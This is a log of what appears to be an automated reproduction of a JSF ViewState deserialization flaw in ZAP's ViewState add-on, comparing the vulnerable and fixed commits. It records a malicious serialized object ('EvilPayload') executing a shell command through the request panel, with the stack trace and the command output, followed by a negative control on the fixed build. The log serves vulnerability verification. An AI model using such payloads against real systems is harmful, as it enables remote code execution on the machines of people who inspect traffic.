============================================================ CVE-2026-57527 variant candidate - request-panel JSF ViewState ============================================================ ROOT=/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle Date: Sun Jul 5 07:30:13 UTC 2026 [setup] Java: openjdk version "17.0.19" 2026-04-21 [setup] Javac: javac 17.0.19 [setup] Using prepared cache repository: /data/pruva/project-cache/a032c641-95cb-4a13-867e-d136b678d029/repo [setup] Vulnerable commit (fixed parent): 7e686c0900e82bb73b57880c0328d012269f8741 [setup] Fixed commit: ac6c3f94d38505bc0facea286a4d3728044c6e5c Preparing worktree (detached HEAD 7e686c09) Updating files: 66% (25030/37756) Updating files: 67% (25297/37756) Updating files: 68% (25675/37756) Updating files: 69% (26052/37756) Updating files: 70% (26430/37756) Updating files: 71% (26807/37756) Updating files: 72% (27185/37756) Updating files: 73% (27562/37756) Updating files: 74% (27940/37756) Updating files: 75% (28317/37756) Updating files: 76% (28695/37756) Updating files: 77% (29073/37756) Updating files: 78% (29450/37756) Updating files: 79% (29828/37756) Updating files: 80% (30205/37756) Updating files: 81% (30583/37756) Updating files: 82% (30960/37756) Updating files: 83% (31338/37756) Updating files: 84% (31716/37756) Updating files: 85% (32093/37756) Updating files: 86% (32471/37756) Updating files: 87% (32848/37756) Updating files: 88% (33226/37756) Updating files: 89% (33603/37756) Updating files: 90% (33981/37756) Updating files: 91% (34358/37756) Updating files: 92% (34736/37756) Updating files: 93% (35114/37756) Updating files: 94% (35491/37756) Updating files: 95% (35869/37756) Updating files: 96% (36246/37756) Updating files: 97% (36624/37756) Updating files: 98% (37001/37756) Updating files: 99% (37379/37756) Updating files: 100% (37756/37756) Updating files: 100% (37756/37756), done. HEAD is now at 7e686c09 Merge pull request #7480 from zapbot/bump-version Preparing worktree (detached HEAD ac6c3f94) Updating files: 41% (15480/37756) Updating files: 42% (15858/37756) Updating files: 43% (16236/37756) Updating files: 44% (16613/37756) Updating files: 45% (16991/37756) Updating files: 46% (17368/37756) Updating files: 47% (17746/37756) Updating files: 48% (18123/37756) Updating files: 49% (18501/37756) Updating files: 50% (18878/37756) Updating files: 51% (19256/37756) Updating files: 52% (19634/37756) Updating files: 53% (20011/37756) Updating files: 54% (20389/37756) Updating files: 55% (20766/37756) Updating files: 56% (21144/37756) Updating files: 57% (21521/37756) Updating files: 58% (21899/37756) Updating files: 59% (22277/37756) Updating files: 60% (22654/37756) Updating files: 61% (23032/37756) Updating files: 62% (23409/37756) Updating files: 63% (23787/37756) Updating files: 64% (24164/37756) Updating files: 65% (24542/37756) Updating files: 66% (24919/37756) Updating files: 67% (25297/37756) Updating files: 68% (25675/37756) Updating files: 69% (26052/37756) Updating files: 70% (26430/37756) Updating files: 71% (26807/37756) Updating files: 72% (27185/37756) Updating files: 73% (27562/37756) Updating files: 74% (27940/37756) Updating files: 75% (28317/37756) Updating files: 76% (28695/37756) Updating files: 77% (29073/37756) Updating files: 78% (29450/37756) Updating files: 79% (29828/37756) Updating files: 80% (30205/37756) Updating files: 81% (30583/37756) Updating files: 82% (30960/37756) Updating files: 83% (31338/37756) Updating files: 84% (31716/37756) Updating files: 85% (32093/37756) Updating files: 86% (32471/37756) Updating files: 87% (32848/37756) Updating files: 88% (33226/37756) Updating files: 89% (33603/37756) Updating files: 90% (33981/37756) Updating files: 91% (34358/37756) Updating files: 92% (34736/37756) Updating files: 92% (35028/37756) Updating files: 93% (35114/37756) Updating files: 94% (35491/37756) Updating files: 95% (35869/37756) Updating files: 96% (36246/37756) Updating files: 97% (36624/37756) Updating files: 98% (37001/37756) Updating files: 99% (37379/37756) Updating files: 100% (37756/37756) Updating files: 100% (37756/37756), done. HEAD is now at ac6c3f94 Merge pull request #7481 from thc202/viewstate/disable-jsf [verify] Vulnerable active JSF registration: addOns/viewstate/src/main/java/org/zaproxy/zap/extension/viewstate/ViewStateModel.java:62: viewstateParams.add(new ViewState(null, JSFViewState.KEY, "javax.faces.ViewState")); [verify] Fixed disabled JSF registration: addOns/viewstate/src/main/java/org/zaproxy/zap/extension/viewstate/ViewStateModel.java:62: // viewstateParams.add(new ViewState(null, JSFViewState.KEY, "javax.faces.ViewState")); [build] Building actual ViewState add-on for vulnerable from 7e686c0900e82bb73b57880c0328d012269f8741 [build] Building actual ViewState add-on for fixed from ac6c3f94d38505bc0facea286a4d3728044c6e5c [compile] Compiling request variant harness against built ZAP component and ZAP core jars === Running vulnerable request-panel variant attempt === payload_bytes=308 payload_bytes=308 2026-07-05T07:30:41.887456158Z main ERROR Log4j API could not find a logging provider. Defaulting ZAP install dir to /home/vscode/.gradle/caches/modules-2/files-2.1/org.zaproxy/zap/2.17.0/fda340fc4d7ec417dadd3c532b5c97f36e186d13 [vuln] request_body_contains_jsf=true [vuln] request_body_length=446 [vuln] real_HttpMessage_request_body_length=446 [vuln] factory=org.zaproxy.zap.extension.viewstate.ExtensionHttpPanelViewStateView$RequestSplitBodyViewStateViewFactory [vuln] view=org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView [vuln] view_loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/vuln_variant/build_request_variant/worktrees/vulnerable/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [vuln] model=org.zaproxy.zap.extension.viewstate.ViewStateModel ViewStateModel.loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/vuln_variant/build_request_variant/worktrees/vulnerable/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap ViewStateModel.param_count=3 ViewStateModel.param name=__VIEWSTATE type=ASP ViewStateModel.param name=__VIEWSTATEFIELDCOUNT type=ASP ViewStateModel.param name=javax.faces.ViewState type=JSF ViewStateModel.has_jsf_registration=true [vuln] invoking real request HttpPanelViewModel.setMessage(HttpMessage) [vuln] marker_exists=true [vuln] rce_output_exists=true [vuln] marker_content_begin DESERIALIZATION_RCE_CONFIRMED_REQUEST_VARIANT command=id > '/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/vuln_variant/artifacts/request_vuln_rce_output.txt'; echo RCE_VIA_ZAP_VIEWSTATE_REQUEST_VARIANT >> '/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/vuln_variant/artifacts/request_vuln_rce_output.txt' process_exit=0 id: cannot find name for group ID 969 stack= at java.base/java.lang.Thread.getStackTrace(Thread.java:1619) at EvilPayload.readObject(EvilPayload.java:33) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.base/java.lang.reflect.Method.invoke(Method.java:569) at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100) at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423) at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257) at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) at org.zaproxy.zap.extension.viewstate.zap.utils.JSFViewState.decode(JSFViewState.java:92) at org.zaproxy.zap.extension.viewstate.zap.utils.JSFViewState.decode(JSFViewState.java:76) at org.zaproxy.zap.extension.viewstate.zap.utils.ViewState.getDecodedValue(ViewState.java:64) at org.zaproxy.zap.extension.viewstate.ViewStateModel.getData(ViewStateModel.java:183) at org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView.dataChanged(HttpPanelViewStateView.java:189) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.notifyAllListeners(DefaultHttpPanelViewModel.java:74) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.fireDataChanged(DefaultHttpPanelViewModel.java:68) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.setMessage(DefaultHttpPanelViewModel.java:42) at org.zaproxy.zap.extension.httppanel.view.impl.models.http.AbstractHttpByteHttpPanelViewModel.setMessage(AbstractHttpByteHttpPanelViewModel.java:34) at RequestVariantHarness.main(RequestVariantHarness.java:95) [vuln] marker_content_end [vuln] rce_output_begin uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),969(969) RCE_VIA_ZAP_VIEWSTATE_REQUEST_VARIANT [vuln] rce_output_end [vuln] harness_exit=0 [vuln] PASS: request-panel alternate trigger reached JSFViewState.decode and executed payload === Running fixed request-panel negative-control attempt === payload_bytes=310 payload_bytes=310 2026-07-05T07:30:42.423793609Z main ERROR Log4j API could not find a logging provider. Defaulting ZAP install dir to /home/vscode/.gradle/caches/modules-2/files-2.1/org.zaproxy/zap/2.17.0/fda340fc4d7ec417dadd3c532b5c97f36e186d13 [fixed] request_body_contains_jsf=true [fixed] request_body_length=452 [fixed] real_HttpMessage_request_body_length=452 [fixed] factory=org.zaproxy.zap.extension.viewstate.ExtensionHttpPanelViewStateView$RequestSplitBodyViewStateViewFactory [fixed] view=org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView [fixed] view_loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/vuln_variant/build_request_variant/worktrees/fixed/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [fixed] model=org.zaproxy.zap.extension.viewstate.ViewStateModel ViewStateModel.loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/vuln_variant/build_request_variant/worktrees/fixed/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap ViewStateModel.param_count=2 ViewStateModel.param name=__VIEWSTATE type=ASP ViewStateModel.param name=__VIEWSTATEFIELDCOUNT type=ASP ViewStateModel.has_jsf_registration=false [fixed] invoking real request HttpPanelViewModel.setMessage(HttpMessage) [fixed] marker_exists=false [fixed] rce_output_exists=false [fixed] harness_exit=0 [fixed] PASS: fixed request-panel did not deserialize malicious JSF ViewState [fixed] Confirmed JSF registration absent in fixed request model [result] NO_BYPASS: variant only works on vulnerable version